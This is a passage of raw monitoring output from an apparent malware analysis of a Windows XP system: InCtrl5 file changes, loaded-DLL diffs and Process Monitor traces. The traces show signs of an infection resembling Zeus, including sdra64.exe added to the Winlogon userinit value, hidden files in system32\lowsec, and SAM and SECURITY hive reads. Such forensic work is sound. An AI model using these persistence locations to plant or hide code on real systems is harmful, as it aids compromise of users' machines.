Old size: 16,384 bytes
New size: 16,384 bytes
c:\Documents and Settings\LocalService\Local Settings\Temp\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 7:44 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes
c:\Documents and Settings\NetworkService\ntuser.dat.LOG
Old date: 4/24/2011 7:44 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes
c:\Documents and Settings\NetworkService\Local Settings\Temp\Cookies\index.dat
Old date: 4/24/2011 3:29 PM
New date: 4/24/2011 8:02 PM
Old size: 16,384 bytes
New size: 16,384 bytes
c:\Documents and Settings\NetworkService\Local Settings\Temp\History\History.IE5\index.dat
Old date: 4/24/2011 3:29 PM
New date: 4/24/2011 8:02 PM
Old size: 16,384 bytes
New size: 16,384 bytes
c:\Documents and Settings\NetworkService\Local Settings\Temp\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 3:29 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes
c:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 7:42 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes
c:\WINDOWS\Prefetch\BT.EXE-28F64617.pf
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 14,114 bytes
New size: 14,232 bytes
c:\WINDOWS\system32\config\default.LOG
Old date: 4/24/2011 7:55 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes
c:\WINDOWS\system32\config\software.LOG
Old date: 4/24/2011 8:01 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes
c:\WINDOWS\system32\config\system.LOG
Old date: 4/24/2011 8:01 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes
c:\WINDOWS\system32\config\systemprofile\Cookies\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes
c:\WINDOWS\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes
c:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes
------------------------------------------------------------
INI file
********
Ini files tracked: 4
--------------------
* C:\boot.ini
* c:\windows\control.ini
* c:\windows\system.ini
* c:\windows\win.ini
------------------------------------------------------------
Text file
*********
Text files tracked: 2
---------------------
* c:\windows\system32\autoexec.nt
* c:\windows\system32\config.nt
------------------------------------------------------------
InCtrl5, Copyright © 2000 by Ziff Davis Media, Inc.
Written by Neil J. Rubenking
First published in PC Magazine, December 5, 2000.
Winmerge List dlls Only showing the difference from listdlls_after.txt
0x3d930000 0xd1000 7.00.6000.17095 wininet.dll
0x00aa0000 0x9000 6.00.5441.0000 Normaliz.dll
0x3dfd0000 0x45000 7.00.6000.17095 iertutil.dll
0x71ad0000 0x9000 5.01.2600.5512 wsock32.dll
0x7c9c0000 0x817000 6.00.2900.6072 shell32.dll
0x77f60000 0x76000 6.00.2900.5912 SHLWAPI.dll
0x5d090000 0x9a000 5.82.2900.6028 comctl32.dll
0x774e0000 0x13e000 5.01.2600.6010 ole32.dll
0x77a80000 0x95000 5.131.2600.5512 crypt32.dll
0x77b20000 0x12000 5.01.2600.5875 MSASN1.dll
0x68000000 0x36000 5.01.2600.5507 rsaenh.dll
0x76bf0000 0xb000 5.01.2600.5512 psapi.dll
0x662b0000 0x58000 5.01.2600.5512 hnetcfg.dll
0x76ee0000 0x3c000 5.01.2600.5512 RASAPI32.dll
0x76e90000 0x12000 5.01.2600.5512 rasman.dll
0x76eb0000 0x2f000 5.01.2600.5512 TAPI32.dll
0x76e80000 0xe000 5.01.2600.5512 rtutils.dll
0x77c70000 0x25000 5.01.2600.5876 msv1_0.dll
0x76790000 0xc000 5.01.2600.5512 cryptdll.dll
0x76d60000 0x19000 5.01.2600.5512 iphlpapi.dll
0x722b0000 0x5000 5.01.2600.5512 sensapi.dll
0x71a50000 0x3f000 5.01.2600.5625 mswsock.dll
0x76fc0000 0x6000 5.01.2600.5512 rasadhlp.dll
0x78130000 0x128000 7.00.6000.17095 urlmon.dll
0x76f20000 0x27000 5.01.2600.5625 DNSAPI.dll
0x71a90000 0x8000 5.01.2600.5512 wshtcpip.dll
0x5e0c0000 0xd000 5.01.2600.5512 pstorec.dll
0x76b20000 0x11000 3.05.2284.0002 ATL.DLL
0x5b860000 0x55000 5.01.2600.5694 netapi32.dll
0x75970000 0xf8000 5.01.2600.5512 MSGINA.dll
0x74320000 0x3d000 3.525.3012.0000 ODBC32.dll
0x763b0000 0x49000 6.00.2900.5512 comdlg32.dll
0x02c50000 0x17000 3.525.1132.0000 odbcint.dll
0x71ab0000 0x17000 5.01.2600.5512 ws2_32.dll
0x71aa0000 0x8000 5.01.2600.5512 WS2HELP.dll
0x7c9c0000 0x817000 6.00.2900.6072 shell32.dll
0x77f60000 0x76000 6.00.2900.5912 SHLWAPI.dll
0x773d0000 0x103000 5.82.2900.6028 comctl32.dll
0x77c00000 0x8000 5.01.2600.5512 VERSION.dll
0x769c0000 0xb4000 5.01.2600.5512 userenv.dll
0x68000000 0x36000 5.01.2600.5507 rsaenh.dll
Winmerge Procmon
Sample output of some of the interesting items discovered. This output is very long.
8:04:53.2816426 PM","winlogon.exe","916","RegCreateKey","HKLM\software\microsoft\windows
nt\currentversion\winlogon","SUCCESS","Desired Access: Query Value, Set Value
8:04:53.2817289 PM","winlogon.exe","916","RegQueryValue","HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\userinit","SUCCESS","Type: REG_SZ, Length: 130, Data:
C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,
8:04:53.2817808 PM","winlogon.exe","916","RegCloseKey","HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon","SUCCESS","" "7:47:44.6292542
PM","lsass.exe","972","RegOpenKey","HKLM\SECURITY\Policy\SecDesc","SUCCESS","Desired Access:
Read" "8:04:53.3393918 PM","lsass.exe","972","RegOpenKey","HKLM\SECURITY\Policy","SUCCESS","Desired Access:
Read/Write"
8:04:53.3394714 PM","lsass.exe","972","RegQueryValue","HKLM\SECURITY\Policy\SecDesc\(Default)","BUFFER
OVERFLOW","Length: 12"
8:04:53.4492538 PM","lsass.exe","972","RegCloseKey","HKLM\SECURITY\Policy","SUCCESS",""
8:04:54.5563677 PM","Explorer.EXE","424","QueryDirectory","C:\Documents and Settings\Kevin\Desktop\ss","SUCCESS","0:
handle.exe, 1: hex2dec.exe, 2: junction.exe, 3: kjk_before.bat, 4: ldmdump.exe, 5: Listdlls.exe, 6: listdlls_before.txt, 7: livekd.exe,
8: LoadOrd.exe, 9: logonsessions.exe, 10: movefile.exe, 11: ntfsinfo.exe, 12: pagedfrg.exe, 13: pagedfrg.hlp, 14: pdh.dll, 15:
pendmoves.exe, 16: pipelist.exe, 17: PORTMON.CNT, 18: portmon.exe, 19: PORTMON.HLP, 20: procdump.exe, 21:
procexp.chm, 22: procexp.exe, 23: ProcFeatures.exe, 24: procmon.chm, 25: Procmon.exe, 26: PsExec.exe, 27: psfile.exe, 28:
PsGetsid.exe, 29: PsInfo.exe, 30: pskill.exe, 31: PsList.exe, 32: pslist_before.txt
verclsid.exe:
CreateFile C: SUCCESS Desired Access: Read Attributes, Write Attributes, Synchronize, Disposition: Open,
Options: Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a, OpenResult: Opened
QueryInformationVolume C: SUCCESS VolumeCreationTime: 3/22/2011 4:48:20 PM, VolumeSerialNumber: 907B-
F0DE, SupportsObjects: True, VolumeLabel:
RegCreateKey HKCU\Software\Microsoft\SystemCertificates\MY SUCCESS Desired Access: All Access
RegQueryValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Personal SUCCESS
Type: REG_EXPAND_SZ, Length: 54, Data: %USERPROFILE%\My Documents
RegQueryValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local Settings SUCCESS
Type: REG_EXPAND_SZ, Length: 58, Data: %USERPROFILE%\Local Settings
RegQueryKey HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Query: Full,
SubKeys: 0, Values: 13
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 0,
Name: ComSpec, Type: REG_EXPAND_SZ, Length: 60, Data: %SystemRoot%\system32\cmd.exe
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 1,
Name: Path, Type: REG_EXPAND_SZ, Length: 124, Data:
%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 2,
Name: windir, Type: REG_EXPAND_SZ, Length: 26, Data: %SystemRoot%
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 3,
Name: OS, Type: REG_SZ, Length: 22, Data: Windows_NT
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 4,
Name: PROCESSOR_ARCHITECTURE, Type: REG_SZ, Length: 8, Data: x86
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 5,
Name: PROCESSOR_LEVEL, Type: REG_SZ, Length: 4, Data: 6
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 6,
Name: PROCESSOR_IDENTIFIER, Type: REG_SZ, Length: 96, Data: x86 Family 6 Model 23 Stepping 10, GenuineIntel
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 7,
Name: PROCESSOR_REVISION, Type: REG_SZ, Length: 10, Data: 170a
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 8,
Name: NUMBER_OF_PROCESSORS, Type: REG_SZ, Length: 4, Data: 1
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 9,
Name: PATHEXT, Type: REG_SZ, Length: 98, Data: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 10,
Name: TEMP, Type: REG_EXPAND_SZ, Length: 36, Data: %SystemRoot%\TEMP
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 11,
Name: TMP, Type: REG_EXPAND_SZ, Length: 36, Data: %SystemRoot%\TEMP
RegEnumValue HKLM\System\CurrentControlSet\Control\Session Manager\Environment SUCCESS Index: 12,
Name: FP_NO_HOST_CHECK, Type: REG_SZ, Length: 6, Data: NO
RegOpenKey HKCU\Volatile Environment SUCCESS Desired Access: Read
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 0, Name: LOGONSERVER, Type: REG_SZ,
Length: 26, Data: \\XPWUPDATES
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 1, Name: CLIENTNAME, Type: REG_SZ, Length:
16, Data: Console
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 2, Name: SESSIONNAME, Type: REG_SZ,
Length: 16, Data: Console
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 3, Name: APPDATA, Type: REG_SZ, Length: 98,
Data: C:\Documents and Settings\Kevin\Application Data
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 4, Name: HOMEDRIVE, Type: REG_SZ, Length:
6, Data: C:
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 5, Name: HOMESHARE, Type: REG_SZ, Length:
2, Data:
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 6, Name: HOMEPATH, Type: REG_SZ, Length:
60, Data: \Documents and Settings\Kevin
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 0, Name: LOGONSERVER, Type: REG_SZ,
Length: 26, Data: \\XPWUPDATES
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 1, Name: CLIENTNAME, Type: REG_SZ, Length:
16, Data: Console
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 2, Name: SESSIONNAME, Type: REG_SZ,
Length: 16, Data: Console
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 3, Name: APPDATA, Type: REG_SZ, Length: 98,
Data: C:\Documents and Settings\Kevin\Application Data
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 4, Name: HOMEDRIVE, Type: REG_SZ, Length:
6, Data: C:
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 5, Name: HOMESHARE, Type: REG_SZ, Length:
2, Data:
RegEnumValue HKCU\Volatile Environment SUCCESS Index: 6, Name: HOMEPATH, Type: REG_SZ, Length:
60, Data: \Documents and Settings\Kevin
QueryNameInformationFile C:\WINDOWS\system32\verclsid.exe SUCCESS Name:
\WINDOWS\system32\verclsid.exe
Load Image C:\WINDOWS\system32\verclsid.exe SUCCESS Image Base: 0x1000000, Image Size: 0xb000
Load Image C:\WINDOWS\system32\ntdll.dll SUCCESS Image Base: 0x7c900000, Image Size: 0xb2000
QueryNameInformationFile C:\WINDOWS\system32\verclsid.exe SUCCESS Name:
\WINDOWS\system32\verclsid.exe
CreateFile C:\WINDOWS\Prefetch\VERCLSID.EXE-3667BD89.pf SHARING VIOLATION Desired Access:
Generic Read, Disposition: Open, Options: Synchronous IO Non-Alert, Attributes: n/a, ShareMode: None, AllocationSize: n/a
RegOpenKey HKLM\Software\Clients\Mail SUCCESS Desired Access: Query Value
RegQueryValue HKLM\SOFTWARE\Clients\Mail\(Default) SUCCESS Type: REG_SZ, Length: 32, Data: Outlook
Express
lsass.exe RegQueryValue
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName SUCCESS Type:
REG_SZ, Length: 22,
Data: XPWUPDATES
HKLM\SAM\SAM\C SUCCESS Type: REG_BINARY, Length: 168,
Data: 07 00 01 00 00 00 00 00 98 00 00 00 02 00 01 00
HKLM\SAM\SAM\Domains\Account\V SUCCESS Type: REG_BINARY, Length: 296,
Data: 00 00 00 00 E0 00 00 00 02 00 01 00 E0 00 00 00
HKLM\SAM\SAM\Domains\Builtin\V SUCCESS Type: REG_BINARY, Length: 212,
Data: 00 00 00 00 98 00 00 00 02 00 01 00 98 00 00 00
HKLM\SAM\SAM\Domains\Account\Users\Names\Kevin\(Default) SUCCESS Type: <Unknown: 1003>, Length: 0
HKLM\SAM\SAM\Domains\Account\Users\000003EB\V SUCCESS Type: REG_BINARY, Length: 444,
Data: 00 00 00 00 BC 00 00 00 02 00 01 00 BC 00 00 00
RegQueryValue HKLM\SAM\SAM\Domains\Account\Users\000003EB\F SUCCESS Type: REG_BINARY, Length:
80,
Data: 02 00 01 00 00 00 00 00 B0 06 A1 4F D9 02 CC 01
HKLM\SECURITY\Policy\SecDesc\(Default) SUCCESS Type: REG_NONE, Length: 180,
Data: 01 00 04 80 98 00 00 00 A8 00 00 00 00 00 00 00
HKLM\SAM\SAM\Domains\Account\Users\Names\SUPPORT_388945a0\(Default) SUCCESS Type: <Unknown: 1002>,Length:
0
HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C SUCCESS Type: REG_BINARY, Length: 440,
Data: 20 02 00 00 00 00 00 00 98 00 00 00 02 00 01 00
HKLM\SAM\SAM\Domains\Account\Users\Names\HelpAssistant\(Default) SUCCESS Type: <Unknown: 1000>, Length: 0
HKLM\SAM\SAM\Domains\Account\Users\Names\Guest\(Default) SUCCESS Type: <Unknown: 501>, Length: 0
HKLM\SAM\SAM\Domains\Account\Users\Names\Administrator\(Default) SUCCESS Type: <Unknown: 500>, Length: 0
Explorer.exe
Process Create C:\WINDOWS\system32\verclsid.exe SUCCESS PID: 2376, Command line: /S /C {2559A1F4-
21D7-11D4-BDAF-00C04F60B9F0} /I {000214E6-0000-0000-C000-000000000046} /X 0x401
Process Create C:\WINDOWS\system32\verclsid.exe SUCCESS PID: 2444, Command line: /S /C {2559A1F5-
21D7-11D4-BDAF-00C04F60B9F0} /I {000214E6-0000-0000-C000-000000000046} /X 0x401
RegCreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders SUCCESS
Desired Access: Maximum Allowed
RegEnumKey HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace SUCCESS
Index: 0, Name: {1f4de370-d627-11d1-ba4f-00a0c91eedba}
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-4B3B-A011-
8BBF40B640BF}\EnableDHCP SUCCESS Type: REG_DWORD, Length: 4, Data: 1
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-4B3B-A011-
8BBF40B640BF}\LeaseObtainedTime SUCCESS Type: REG_DWORD, Length: 4, Data: 1303688626
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-4B3B-A011-
8BBF40B640BF}\DhcpServer SUCCESS Type: REG_SZ, Length: 32, Data: 255.255.255.255
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{1DFB3CAE-1ACD-4CE9-A8F6-
0548AB912EF5}\LeaseObtainedTime SUCCESS Type: REG_DWORD, Length: 4, Data: 1303688565
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{1DFB3CAE-1ACD-4CE9-A8F6-
0548AB912EF5}\LeaseTerminatesTime SUCCESS Type: REG_DWORD, Length: 4, Data: 1303774965
RegQueryValue HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{1DFB3CAE-1ACD-4CE9-A8F6-
0548AB912EF5}\DhcpServer SUCCESS Type: REG_SZ, Length: 24, Data: 192.168.1.1
svchost.exe
CreateFile C:\WINDOWS\system32\wbem\Logs\wbemcore.log SUCCESS Desired Access: Generic Write, Read
Attributes, Disposition: OpenIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: NNCI, ShareMode: Read,
Delete, AllocationSize: 0, OpenResult: Opened
CreateFile C:\WINDOWS\system32\wbem\wmiprvse.exe SUCCESS Desired Access: Read Data/List
Directory, Execute/Traverse, Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-
Directory File, Attributes: n/a, ShareMode: Read, Delete, AllocationSize: n/a, Impersonating: NT AUTHORITY\SYSTEM,
OpenResult: Opened
CreateFile C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Desired Access: Generic Read, Disposition:
Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: Read, AllocationSize: n/a,
Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Opened
CreateFile C:\WINDOWS\system32\wbem SUCCESS Desired Access: Read EA, Read Attributes, Read Control,
Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a, Impersonating: NT
AUTHORITY\SYSTEM, OpenResult: Opened
CreateFile C:\WINDOWS\WinSxS SUCCESS Desired Access: Read EA, Read Attributes, Read Control,
Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a, Impersonating: NT
AUTHORITY\SYSTEM, OpenResult: Opened
CreateFile C:\WINDOWS\WinSxS\X86_MICROSOFT.WINDOWS.COMMON-
CONTROLS_6595B64144CCF1DF_6.0.2600.6028_X-WW_61E65202 SUCCESS Desired Access: Read EA,
Read Attributes, Read Control, Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a,
Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Opened
CreateFile C:\WINDOWS\Prefetch\WMIPRVSE.EXE-28F301A9.pf SUCCESS Desired Access: Generic
Read/Write, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode:
None, AllocationSize: 0, Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Overwritten
CreateFile C:\WINDOWS\Prefetch SUCCESS Desired Access: Synchronize, Disposition: Open, Options:
Directory, Synchronous IO Non-Alert, Open For Backup, Attributes: N, ShareMode: Read, Write, AllocationSize: n/a,
Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Opened
CreateFile C:\WINDOWS\system32\lowsec\user.ds.lll SUCCESS Desired Access: Generic Read/Write,
Disposition: OpenIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: H, ShareMode: Read, AllocationSize: 0,
OpenResult: Opened
CreateFile C:\WINDOWS\system32\lowsec\local.ds SUCCESS Desired Access: Generic Read, Disposition:
Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: Read, AllocationSize: n/a,
OpenResult: Opened
CreateFile C:\WINDOWS\system32\config\systemprofile\Cookies\system@kerkvlietkj[1].txt SUCCESS
Desired Access: Generic Write, Read Attributes, Disposition: Create, Options: Synchronous IO Non-Alert, Non-
Directory File, Attributes: NCI, ShareMode: Read, Write, Delete, AllocationSize: 0, OpenResult: Created
CreateFile C:\WINDOWS\WINDOWSSHELL.MANIFEST SUCCESS Desired Access: Read EA, Read
Attributes, Read Control, Disposition: Open, Options: , Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a,
Impersonating: NT AUTHORITY\SYSTEM, OpenResult: Opened
FlushBuffersFile C:\WINDOWS\system32\lowsec\user.ds.lll SUCCESS
Process Create C:\WINDOWS\system32\wbem\wmiprvse.exe SUCCESS PID: 3540, Command line:
C:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding
QueryOpen C:\WINDOWS\win.ini SUCCESS CreationTime: 8/23/2001 8:00:00 AM, LastAccessTime: 4/24/2011
8:03:01 PM, LastWriteTime: 3/23/2011 1:23:23 AM, ChangeTime: 3/23/2011 1:23:23 AM, AllocationSize: 520, EndOfFile: 519,
FileAttributes: A
QueryOpen C:\WINDOWS\WINDOWSSHELL.MANIFEST SUCCESS CreationTime: 3/22/2011 9:56:13 PM,
LastAccessTime: 4/24/2011 8:04:59 PM, LastWriteTime: 3/22/2011 9:56:13 PM, ChangeTime: 3/22/2011 9:56:13 PM,
AllocationSize: 4,096, EndOfFile: 749, FileAttributes: RHA
QueryOpen C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-
ww_61e65202\comctl32.dll SUCCESS CreationTime: 3/23/2011 9:15:46 PM, LastAccessTime: 4/24/2011 8:04:59
PM, LastWriteTime: 8/23/2010 12:12:02 PM, ChangeTime: 3/23/2011 10:15:32 PM, AllocationSize: 1,056,768, EndOfFile:
1,054,208, FileAttributes: A
QueryOpen C:\Documents and Settings\Kevin\Cookies\index.dat SUCCESS CreationTime: 3/22/2011 9:33:30 PM,
LastAccessTime: 3/22/2011 9:33:30 PM, LastWriteTime: 4/24/2011 8:03:50 PM, ChangeTime: 4/24/2011 8:03:51 PM,
AllocationSize: 32,768, EndOfFile: 32,768, FileAttributes: A
QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][2].TXT SUCCESS
CreationTime: 4/24/2011 7:59:22 PM, LastAccessTime: 4/24/2011 7:59:22 PM, LastWriteTime: 4/24/2011 7:59:22 PM,
ChangeTime: 4/24/2011 7:59:22 PM, AllocationSize: 192, EndOfFile: 185, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@BING[1].TXT SUCCESS CreationTime:
4/24/2011 7:59:22 PM, LastAccessTime: 4/24/2011 7:59:23 PM, LastWriteTime: 4/24/2011 7:59:23 PM, ChangeTime: 4/24/2011
7:59:23 PM, AllocationSize: 200, EndOfFile: 200, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@GOOGLE[1].TXT SUCCESS
CreationTime: 4/24/2011 7:44:16 PM, LastAccessTime: 4/24/2011 7:58:30 PM, LastWriteTime: 4/24/2011 7:44:17 PM,
ChangeTime: 4/24/2011 7:44:17 PM, AllocationSize: 352, EndOfFile: 350, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][1].TXT SUCCESS CreationTime:
4/24/2011 7:44:41 PM, LastAccessTime: 4/24/2011 7:44:41 PM, LastWriteTime: 4/24/2011 7:44:41 PM, ChangeTime: 4/24/2011
7:44:41 PM, AllocationSize: 72, EndOfFile: 69, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][1].TXT SUCCESS
CreationTime: 4/24/2011 7:44:38 PM, LastAccessTime: 4/24/2011 7:44:38 PM, LastWriteTime: 4/24/2011 7:44:38 PM,
ChangeTime: 4/24/2011 7:44:38 PM, AllocationSize: 288, EndOfFile: 286, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][1].TXT SUCCESS
CreationTime: 4/24/2011 7:44:39 PM, LastAccessTime: 4/24/2011 7:44:39 PM, LastWriteTime: 4/24/2011 7:44:39 PM,
ChangeTime: 4/24/2011 7:44:39 PM, AllocationSize: 200, EndOfFile: 196, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@MICROSOFT[1].TXT SUCCESS
CreationTime: 4/24/2011 7:46:29 PM, LastAccessTime: 4/24/2011 7:46:31 PM, LastWriteTime: 4/24/2011 7:46:31 PM,
ChangeTime: 4/24/2011 7:46:31 PM, AllocationSize: 456, EndOfFile: 452, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@MOOKIE1[2].TXT SUCCESS
CreationTime: 4/24/2011 7:46:03 PM, LastAccessTime: 4/24/2011 7:46:03 PM, LastWriteTime: 4/24/2011 7:46:03 PM,
ChangeTime: 4/24/2011 7:46:03 PM, AllocationSize: 176, EndOfFile: 172, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][1].TXT SUCCESS
CreationTime: 4/24/2011 7:59:22 PM, LastAccessTime: 4/24/2011 7:59:22 PM, LastWriteTime: 4/24/2011 7:59:22 PM,
ChangeTime: 4/24/2011 7:59:22 PM, AllocationSize: 120, EndOfFile: 115, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Local Settings\History\History.IE5\index.dat SUCCESS
CreationTime: 3/22/2011 9:33:30 PM, LastAccessTime: 3/22/2011 9:33:30 PM, LastWriteTime: 4/24/2011 8:03:50 PM,
ChangeTime: 4/24/2011 8:03:51 PM, AllocationSize: 49,152, EndOfFile: 49,152, FileAttributes: A
QueryOpen C:\Documents and Settings\Kevin\Local Settings\Temporary Internet Files\Content.IE5\index.dat SUCCESS
CreationTime: 3/22/2011 9:33:30 PM, LastAccessTime: 3/22/2011 9:33:30 PM, LastWriteTime: 4/24/2011 8:03:50 PM,
ChangeTime: 4/24/2011 8:03:51 PM, AllocationSize: 425,984, EndOfFile: 425,984, FileAttributes: A
ReadFile C:\WINDOWS\system32\wbem\Repository\FS\INDEX.BTR SUCCESS Offset: 327,680, Length: 8,192
ReadFile C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA SUCCESS Offset: 5,693,440,
Length: 8,192
RegCreateKey HKLM\Software\Microsoft\WBEM\CIMOM SUCCESS Desired Access: Read
RegCreateKey HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History
SUCCESS Desired Access: Read, Create Sub Key
RegQueryValue HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\Logging SUCCESS Type: REG_SZ, Length: 4,
Data: 1
RegQueryValue HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\Log File Max Size SUCCESS Type: REG_SZ,
Length: 12, Data: 65536
RegQueryValue HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Strong Cryptographic
Provider\Image Path SUCCESS Type: REG_SZ, Length: 22, Data: rsaenh.dll
RegQueryValue HKLM\SYSTEM\Setup\SystemSetupInProgress SUCCESS Type: REG_DWORD, Length: 4, Data:
0
RegQueryValue HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 001\Name SUCCESS
Type: REG_SZ, Length: 80, Data: Microsoft Strong Cryptographic Provider
RegQueryValue HKLM\SOFTWARE\Microsoft\COM3\REGDBVersion SUCCESS Type: REG_BINARY, Length:
8, Data: 07 00 00 00 00 00 00 00
RegQueryValue HKCR\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppID SUCCESS Type:
REG_SZ, Length: 78, Data: {8BC3F05E-D86B-11D0-A075-00C04FB68820}
RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService SUCCESS Type:
REG_SZ, Length: 16, Data: winmgmt
RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default) SUCCESS Type:
REG_SZ, Length: 78, Data: Windows Management and Instrumentation
RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService SUCCESS Type:
REG_SZ, Length: 16, Data: winmgmt
RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LaunchPermission SUCCESS
